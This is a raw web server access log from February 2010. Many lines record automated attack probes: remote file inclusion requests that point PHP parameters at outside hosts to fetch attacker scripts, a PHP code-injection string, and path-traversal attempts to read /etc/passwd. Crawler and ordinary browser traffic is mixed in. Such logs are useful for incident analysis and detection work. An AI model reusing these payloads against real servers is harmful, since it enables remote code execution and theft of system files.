75.125.84.226 - - [15/Feb/2010:00:44:44 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:44:44 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:00:44:47 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:00:44:47 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:44:47 -0500] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:00:44:47 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:00:45:06 -0500] "GET /logs/access_log.Q109121100//salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:45:40 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:45:40 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:45:40 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:00:45:46 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E33328800073D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.112.126.5 - - [15/Feb/2010:00:45:57 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:45:57 -0500] "GET /logs/access_log.Q110020700%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:45:57 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:46:42 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:46:42 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:46:42 -0500] "GET /logs/access_log.Q110020700%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:46:43 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:47:15 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:47:28 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:47:28 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:47:28 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:47:49 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:00:47:18 -0500] "GET /logs/access_log.Q110021200 HTTP/1.1" 200 5226863 "-" "Yandex/1.01.001 (compatible; Win16; I)"
85.112.126.5 - - [15/Feb/2010:00:48:03 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:00:48:16 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.112.126.5 - - [15/Feb/2010:00:48:43 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:49:22 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:49:35 -0500] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:49:45 -0500] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:00:50:00 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:50:19 -0500] "GET /logs/access_log.Q109081500//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:00:49:48 -0500] "GET /logs/access_log.Q109070700 HTTP/1.0" 200 4914184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.186 - - [15/Feb/2010:00:50:36 -0500] "GET /logs/access_log.Q109113000 HTTP/1.0" 200 4068743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.240.36.36 - - [15/Feb/2010:00:51:26 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
222.239.227.209 - - [15/Feb/2010:00:51:39 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:51:39 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:51:39 -0500] "GET /logs/access_log.Q109092200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:51:46 -0500] "GET /logs/access_log.Q109092200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:51:46 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:51:46 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:52:21 -0500] "GET /logs/access_log.Q109081500//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:00:52:51 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:00:52:51 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:00:52:52 -0500] "GET /logs/access_log.Q110012100%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:00:52:52 -0500] "GET /logs/access_log.Q110020100%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:00:53:13 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:00:53:13 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:00:53:13 -0500] "GET /logs/access_log.Q110020800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:00:53:39 -0500] "GET /logs/access_log.Q110011600//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:00:53:52 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:00:53:52 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:00:53:52 -0500] "GET /logs/access_log.Q109102900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:00:54:01 -0500] "GET /logs/access_log.Q109102900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:00:54:01 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:00:54:01 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.52.122.70 - - [15/Feb/2010:00:54:09 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.52.122.70 - - [15/Feb/2010:00:54:09 -0500] "GET /logs/access_log.Q110020800//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.52.122.70 - - [15/Feb/2010:00:54:09 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:00:54:29 -0500] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.52.122.70 - - [15/Feb/2010:00:54:35 -0500] "GET /logs/access_log.Q110011600//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:54:47 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:54:47 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:54:47 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.106.241.31 - - [15/Feb/2010:00:55:03 -0500] "GET /logs/access_log.Q109081500//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:55:13 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:55:13 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:55:13 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:55:38 -0500] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
71.230.197.251 - - [15/Feb/2010:00:55:56 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
71.230.197.251 - - [15/Feb/2010:00:55:56 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
71.230.197.251 - - [15/Feb/2010:00:55:57 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
71.230.197.251 - - [15/Feb/2010:00:55:57 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
118.217.216.132 - - [15/Feb/2010:00:56:00 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:00:56:00 -0500] "GET /logs/access_log.Q110012100%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.217.216.132 - - [15/Feb/2010:00:56:00 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:00:56:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.36.1.51 - - [15/Feb/2010:00:56:18 -0500] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.61.244.6 - - [15/Feb/2010:00:56:33 -0500] "GET /logs/access_log.Q110011500//index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
209.61.244.6 - - [15/Feb/2010:00:56:33 -0500] "GET //index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
209.61.244.6 - - [15/Feb/2010:00:56:33 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
209.61.244.6 - - [15/Feb/2010:00:56:50 -0500] "GET /logs/access_log.Q110011600//index.php?DOCUMENT_ROOT=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
118.217.216.132 - - [15/Feb/2010:00:58:17 -0500] "GET /logs/access_log.Q110020100%20%20//bbs//delete_comment.php?board_skin_path=http://astru2.fileave.com/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:00:58:43 -0500] "GET /images/_notes/home_welcome_bkgrd4.jpg.mno HTTP/1.1" 200 251 "-" "Yandex/1.01.001 (compatible; Win16; I)"
174.36.1.51 - - [15/Feb/2010:00:59:03 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:59:03 -0500] "GET /logs/access_log.Q109103100//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:59:04 -0500] "GET /logs/access_log.Q109062900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:00:59:04 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
71.230.197.251 - - [15/Feb/2010:00:59:21 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
210.127.209.105 - - [15/Feb/2010:00:59:27 -0500] "GET /bbs/write.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.36.1.51 - - [15/Feb/2010:01:00:11 -0500] "GET /logs/access_log.Q109090800%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:00:56 -0500] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
82.151.132.176 - - [15/Feb/2010:01:01:02 -0500] "GET /logs/access_log.Q109052200//administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
82.151.132.176 - - [15/Feb/2010:01:01:02 -0500] "GET //administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
82.151.132.176 - - [15/Feb/2010:01:01:02 -0500] "GET /logs//administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
82.151.132.176 - - [15/Feb/2010:01:01:02 -0500] "GET /logs/access_log.Q109070300//administrator/index.php?page=store.shipping_module_form&shipping_module=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
210.127.209.105 - - [15/Feb/2010:01:01:47 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.127.209.105 - - [15/Feb/2010:01:01:47 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.127.209.105 - - [15/Feb/2010:01:01:48 -0500] "GET /logs/error_log.Q109090200/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.36.1.51 - - [15/Feb/2010:01:02:08 -0500] "GET /logs/access_log.Q109090800%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:02:25 -0500] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:02:46 -0500] "GET /logs/access_log.Q109103100%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:02:46 -0500] "GET /logs/access_log.Q109062900%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:04:16 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.104.3.102 - - [15/Feb/2010:01:04:38 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
76.104.3.102 - - [15/Feb/2010:01:04:38 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
208.93.149.176 - - [15/Feb/2010:01:06:38 -0500] "GET /wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:06:38 -0500] "GET /logs/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:06:40 -0500] "GET /logs/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:06:40 -0500] "GET /logs/error_log.Q109120300%20%20/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:06:40 -0500] "GET /index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:06:41 -0500] "GET /index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:06:41 -0500] "GET /logs/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:06:41 -0500] "GET /logs/error_log.Q109120300%20%20/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:01:08:14 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:01:08:14 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.127.209.105 - - [15/Feb/2010:01:08:16 -0500] "GET /logs/error_log.Q109120300/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
58.230.162.220 - - [15/Feb/2010:01:08:21 -0500] "GET /logs/access_log.Q109081500%20%20/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.230.162.220 - - [15/Feb/2010:01:08:21 -0500] "GET /logs/access_log.Q109081500%20%20/index2.php?x=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.209.105 - - [15/Feb/2010:01:08:57 -0500] "GET /logs/access_log.Q110011500/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.186.64.181 - - [15/Feb/2010:01:09:37 -0500] "GET /logs//salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
